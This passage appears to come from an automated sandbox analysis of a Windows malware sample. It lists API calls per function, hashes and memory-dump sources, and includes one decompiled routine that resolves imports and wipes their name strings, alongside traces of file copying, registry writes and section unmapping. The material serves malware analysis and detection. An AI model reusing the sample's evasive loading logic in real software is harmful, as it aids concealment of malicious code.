  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
